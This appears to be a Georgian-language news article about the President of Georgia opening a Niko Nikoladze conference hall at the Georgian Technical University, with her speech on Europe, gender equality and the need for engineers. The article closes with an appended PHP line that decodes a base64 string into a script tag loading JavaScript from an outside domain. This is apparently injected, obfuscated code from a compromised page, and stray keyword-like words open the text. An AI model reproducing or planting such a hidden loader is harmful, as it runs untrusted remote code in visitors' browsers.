celsiusi
ავერსი საქკაბელი

საქართველოს პრეზიდენტმა დღეს საქართველოს ტექნიკურ უნივერსიტეტში ნიკო ნიკოლაძის სახელობის საკონფერენციო დარბაზი გახსნა, რომელსაც უნივერსიტეტის პროფესორ-მასწავლებლები და სტუდენტები ესწრებოდნენ.

როგორც პრეზიდენტმა აღნიშნა, მომავალი წელი ნიკო ნიკოლაძის საიუბილეო წელია, ასევე, მომავალი წელი საქართველოსთვის ევროპის წელი იქნება და ამის დაკავშირება ნიკო ნიკოლაძესთან ძალიან სწორია, რამეთუ სახელმწიფოს შესახებ ყველა მისი მოწოდება და  ყველა მისი აზრი ევროპის გზას ემთხვევა.

„მინდა, მოგილოცოთ დღევანდელი დღე, ნიკო ნიკოლაძის სახელობის დარბაზის გახსნა, რომელიც სიმბოლურად დიდი მნიშვნელობის მატარებელია. თქვენ იცით, რომ ჩვენ პრემიერის ადმინისტრაციასთან დაწყებული გვაქვს მუშაობა იმისათვის, რომ მომავალი წელი იყოს ნიკო ნიკოლაძის წელი. სახელმწიფო კომისია უთუოდ შეიქმნება. მთავარი იდეაა, რომ მომავალი წელი საქართველოსთვის ევროპის წელი იყოს და ამის დაკავშირება ნიკო ნიკოლაძესთან ძალიან სწორია, რამეთუ სახელმწიფოს შესახებ ყველა მისი მოწოდება, ყველა მისი აზრი ევროპის გზას ემთხვევა, რადგან რასაც ევროპა გულისხმობს, ის ყველაფერი ჩვენშია. აქ ნახსენები იყო სასამართლო და ჩვენ ოდიდან გვქონდა ამის ადათი და ტრადიცია, რომელიც შუალედში დაგვაკარგინეს, მაგრამ ამისი აღდგენა შეიძლება. თვითმმართველობა – თვითმმართველი მხარეების გარეშე საქართველო ვერ მოვიდოდა დღემდე და ვერ გაუძლებდა შემოტევებს მისი ისტორიის მთელ გზაზე. გენდერი – ეს ერთ-ერთი მისთვის ძალიან მნიშვნელოვანი თემა იყო. თვლიდა, რომ ქალებსა და ვაჟებს შორის არანაირი განსხვავება არ იყო და პირველობაზე თუ ვსაუბრობთ, მან პირველმა გაიყვანა ქართველი ქალი სტუდენტები საზღვარგარეთ, შვეიცარიაში სასწავლებლად.

ჩემთვის ძალიან დიდი პატივია, რომ ნიკო ნიკოლაძის შთამომავალი ვარ, მაგრამ ეს შთამომავლობა დიდი პასუხისმგებლობა და ვალდებულებაცაა და იმედი მაქვს, რომ მეც შევიტან წვლილს მისი ცხოვრების მთელი არსისა და მიზნის განხორციელებაში – ამ ქვეყნისა და ამ სახელმწიფოს გაძლიერებაში. დაბოლოს, მინდა, სტუდენტებსაც მივმართო: დღეს ძალიან დიდი ტენდენციაა და საჭიროცაა, რომ სტუდენტები გავიდნენ ქვეყნიდან, სწორედ ნიკო ნიკოლაძის მაგალითის მსგავსად, საზღვარგარეთ მიიღონ კიდევ მეტი სპეციალიზაცია და მოიარონ მსოფლიო, ის ჯერ იყო რუსეთში, შემდეგ ევროპაში და იქიდან ჩამოიტანა ყველაფერი, რაც ჩამოსატანი იყო. მაგრამ მისი მაგალითია ისიც, რომ დაბრუნდა საქართველოში ყველაზე ცუდ პერიოდში. ეს არის მაგალითი, რომ უცხოეთში უნდა მიიღო ყველაფერი, კარგი და ცუდი გაარჩიო, დაბრუნდე აქ და შენი წვლილი შეიტანო ამ ქვეყნის მშენებლობაში. ეს იმაზე მეტყველებს, რომ ნიკო ნიკოლაძე იყო მომავალზე ორიენტირებული. მთავარი მისი საქმიანობის გაგრძელებაა, რომ ახალგაზრდები იყვნენ სახელმწიფო ინტერესებით და სახელმწიფოზე ზრუნვით აღჭურვილნი და ახალი საქართველო ააშენონ. ჩვენ როგორც არასოდეს, ისე გვჭირდება ინჟინრები. გვაქვს ამისი უნარი და ნიჭი, მაგრამ საჭიროა, რომ ყველა დარგი შეივსოს და არ იყოს დეფიციტური პროფესიები, თუ გვინდა, რომ სახელმწიფო იყოს ძლიერი“, – განაცხადა საქართველოს პრეზიდენტმა.

343
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");